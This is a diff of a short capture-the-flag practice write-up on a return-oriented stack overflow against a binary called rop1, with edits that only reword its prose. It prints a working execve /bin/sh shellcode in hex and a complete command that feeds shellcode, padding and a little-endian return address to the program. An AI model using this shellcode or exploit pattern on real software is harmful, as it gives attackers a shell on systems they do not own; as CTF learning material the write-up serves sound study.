yoshi-1224/CTF-practices/ROP1.md

 (gdb) info register eax
 eax         0xfffd6e0
 ```
 Take the difference, and this gives ```76```.
-This tells us that we should pass in a string of length 76 to fill the gap, which is followed by the 4 bytes giving the address of the ROP gadget we identified previously.
+This tells us that we should pass in a string of length 76 to fill the gap, which is then followed by the 4 bytes giving the address of the ROP gadget we identified previously.
 Not over yet.
 The string we pass in must contain the shellcode we want to execute.
-Let's use this one for now
+Let's use this one
 ```
 ”\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh”
 ```
-Note that this system is little-endian.
-So we had to reverse the order of the hex digits: this applies to the address of the ROP-gadget too.
+Note that this system is little-endian, meaning we had to reverse the order of the hex digits: this applies to the address of the ROP-gadget too.
 Finally, we just feed this to the program as follows
 ```
 ./rop1 $(python -c 'print "\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh"+ "a"*38 + "\x86\x8d\x04\x08" ')
 ```